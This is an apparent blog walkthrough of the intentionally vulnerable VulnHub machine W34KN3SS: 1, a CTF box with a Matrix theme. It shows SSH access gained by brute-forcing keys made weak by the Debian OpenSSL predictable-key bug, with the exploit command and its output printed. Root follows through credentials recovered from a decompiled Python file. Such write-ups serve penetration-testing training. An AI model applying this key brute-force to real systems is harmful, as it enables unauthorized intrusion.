The matrix is controlling this machine, neo is trying to escape from it and take back the control on it , your goal is to help neo to gain access as a “root” to this machine , through this machine you will need to perform a hard enumration on the target and understand what is the main idea of it , and exploit every possible “weakness” that you can found , also you will be facing some upnormal behaviours during exploiting this machine.

This machine was made for Jordan’s Top hacker 2018 CTF , we tried to make it simulate a real world attacks “as much as possible” in order to improve your penetration testing skills , also we but a little tricky techniques on it so you can learn more about some unique skills.

Difficulty: Intermediate , you need to think out of the box and collect all the puzzle pieces in order to get the job done.

This box is on the NetSecFocus Admin list of OSCP-like machines. It’s W34KN3SS: 1 from vulnhub. It’s got a mild Matrix theme.


This box has SSH, HTTP and HTTPS on the standard ports (22, 80 and 443). A detail scan, or viewing the SSL certificate, gives some useful information:

Organization weakness.jth
Common Name weakness.jth
Email Address n30@weakness.jth

I add weakness.jth to /etc/hosts.

HTTP/HTTPS and hints

I enumerate the webservices with gobuster and turn up some things:

At we get a meme with some text:

it’s all about keys :D

At http://weakness.jth/ we get a message from n30 - same user as in the email address on the SSL certificate.

At http://weakness.jth/private/ we find an SSH public key and a note, with the text:

this key was generated by openssl 0.9.8c-1


This version of OpenSSL had a bug that reduced the available keyspace:

When creating a new OpenSSH key, there are only 32,767 possible outcomes for a given architecture, key size, and key type.

This means that we can try all possible keys to see if one works, hence the hint about needing lots of keys. I used the python exploit code from searchsploit:

root@kali:/opt/vulnhub/w34kn3ss# python ./5622/rsa/2048/ root 22 5

Which found a working key for our user n30:

Key Found in file: 4161de56829de2fe64b9055711f531c1-2537
Execute: ssh -ln30 -p22 -i ./5622/rsa/2048//4161de56829de2fe64b9055711f531c1-2537

Tested 3429 keys | Remaining 29339 keys | Aprox. Speed 15/sec
# ssh -ln30 -p22 -i ./5622/rsa/2048//4161de56829de2fe64b9055711f531c1-2537
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

 * Documentation:
 * Management:
 * Support:

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
New release '20.04.1 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Tue Aug 14 13:29:20 2018 from


Our user n30 is a member of the sudo group and in his home directory is an interesting file called code. The file is a compiled python script:

n30@W34KN3SS:~$ file code
code: python 2.7 byte-compiled

If we run it, we get this:

n30@W34KN3SS:~$ which python
n30@W34KN3SS:~$ python code
[+]System Started at : Wed Nov 18 12:28:29 2020
[+]This binary should generate unique hash for the hardcoded login info
[+]Generating the hash ..
[+]Your new hash is : 9d3318d8beb128b1c85c9590fbf12c695b4a23ad7040492f67b59d4c4c28f858

Did someone say hardcoded login info?


I copy the binary over to kali and try to run uncompyle6 on it; that’s failing for some reason. There is something going on with python versions but it’s not immediately clear what. Instead what I do is setup a python virtual environment, clone the uncompyle2 repo from GitHub into it and then decompile the file there so I’ve got no mix ups with versions. The sequence of commands was broadly this (taken from my bash history):

2038  apt-get install python3-venv
2067  mkdir uncompyle2
2068  cd uncompyle2
2069  git clone .
2071  virtualenv -p /usr/bin/python2.7 venv2
2072  source venv2/bin/activate
2073  ls
2074  python install
2075  uncompyle2 /opt/vulnhub/w34kn3ss/code
2076  uncompyle2 /opt/vulnhub/w34kn3ss/code > out
2077  ls
2078  file out
2079  cat out

So what’s in out? Effectively it’s our credentials, with some other stuff that’s not important:



With our credentials and being a member of the sudo group it’s game over:

n30@W34KN3SS:~$ sudo su
[sudo] password for n30: 
root@W34KN3SS:/home/n30# cd /root
root@W34KN3SS:~# ls -lash
total 44K
4.0K drwx------  4 root root 4.0K Aug 14  2018 .
4.0K drwxr-xr-x 22 root root 4.0K May  5  2018 ..
4.0K -rw-------  1 root root    6 Aug 14  2018 .bash_history
4.0K -rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
4.0K drwx------  2 root root 4.0K Aug 14  2018 .cache
4.0K drwxr-xr-x  3 root root 4.0K May  5  2018 .local
4.0K -rw-------  1 root root  114 May  5  2018 .mysql_history
4.0K -rw-r--r--  1 root root  148 Aug 17  2015 .profile
4.0K -rw-------  1 root root 1.0K May  5  2018 .rnd
4.0K -rw-r--r--  1 root root   33 May  8  2018 root.txt
4.0K -rw-r--r--  1 root root   66 Aug 14  2018 .selected_editor
root@W34KN3SS:~# cat root.txt

Goodbye, Mr Anderson.